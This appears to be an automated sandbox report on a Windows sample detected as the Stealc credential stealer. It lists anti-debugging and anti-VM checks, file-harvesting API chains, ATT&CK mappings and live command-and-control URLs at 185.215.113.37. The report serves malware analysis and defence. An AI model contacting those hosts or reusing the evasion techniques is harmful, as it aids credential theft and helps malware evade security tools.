                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2EF7 second address: AD2F01 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2F01 second address: AD2F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2F07 second address: AD2F11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2F11 second address: AD2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD337B second address: AD3381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD3381 second address: AD33AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B09070BD8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0B09070BC6h 0x00000014 jne 00007F0B09070BC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD33AE second address: AD33C6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B08CB6D16h 0x00000008 jmp 00007F0B08CB6D1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2DD7 second address: AE2DEA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F0B09070BC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF586F second address: AF5873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5873 second address: AF5883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F0B09070BC6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5883 second address: AF58DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0B08CB6D2Ch 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0B08CB6D28h 0x00000013 jmp 00007F0B08CB6D1Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F0B08CB6D16h 0x00000020 jmp 00007F0B08CB6D1Ah 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5429 second address: AF542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02DE3 second address: B02DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02DE7 second address: B02DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02DEB second address: B02DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007F0B08CB6D16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B06DAF second address: B06DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07079 second address: B0707D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B072F8 second address: B07307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F0B09070BC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08C77 second address: B08C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08C7C second address: B08C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F0B09070BC6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B09070BCFh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08C9C second address: B08CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08CB6 second address: B08CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08CC4 second address: B08CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08CCF second address: B08CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0A2D2 second address: B0A2E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 js 00007F0B08CB6D16h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CD6D second address: B0CD73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CD73 second address: B0CDA5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F0B08CB6D16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dx, FC37h 0x00000013 push 00000004h 0x00000015 and edx, dword ptr [ebp+122D220Fh] 0x0000001b call 00007F0B08CB6D19h 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007F0B08CB6D1Ch 0x00000028 jne 00007F0B08CB6D16h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0CDA5 second address: B0CDCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F0B09070BC8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E8E7 second address: B0E8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E43A second address: B0E44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B09070BCEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E44F second address: B0E46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B08CB6D28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E46D second address: B0E481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BCFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150335 second address: 5150344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150344 second address: 5150398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0B09070BCFh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F0B09070BD9h 0x0000000f and al, 00000006h 0x00000012 jmp 00007F0B09070BD1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0B09070BCCh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150398 second address: 515039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515039E second address: 51503A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150432 second address: 5150469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov bl, al 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dh, E2h 0x00000010 pushfd 0x00000011 jmp 00007F0B08CB6D1Ch 0x00000016 or esi, 4F35BFB8h 0x0000001c jmp 00007F0B08CB6D1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5150469 second address: 515046D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515046D second address: 5150473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32DCA second address: A32DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32DE2 second address: A32DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 881AB3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A238D5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AB0A82 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00634910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0062DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0062E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00634570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0062ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0062BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00633EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F68A FindFirstFileA,0_2_0062F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00621160 GetSystemInfo,ExitProcess,0_2_00621160
                Source: file.exe, file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: hgfst
                Source: file.exe, 00000000.00000002.2147145348.000000000134A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001376000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13687
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13684
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13706
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13698
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13738
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006245C0 VirtualProtect ?,00000004,00000100,000000000_2_006245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00639860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639750 mov eax, dword ptr fs:[00000030h]0_2_00639750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00637850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00639600
                Source: file.exe, file.exe, 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00637B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00636920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00636920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00637850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00637A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.620000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.620000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5004, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe55%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                s-part-0017.t-0009.fb-t-msedge.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpL17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php717%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phps17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpE17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpC17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.fb-t-msedge.net
                		13.107.253.45
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpLfile.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpEfile.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpCfile.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php7file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532905
                Start date and time:2024-10-14 06:52:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
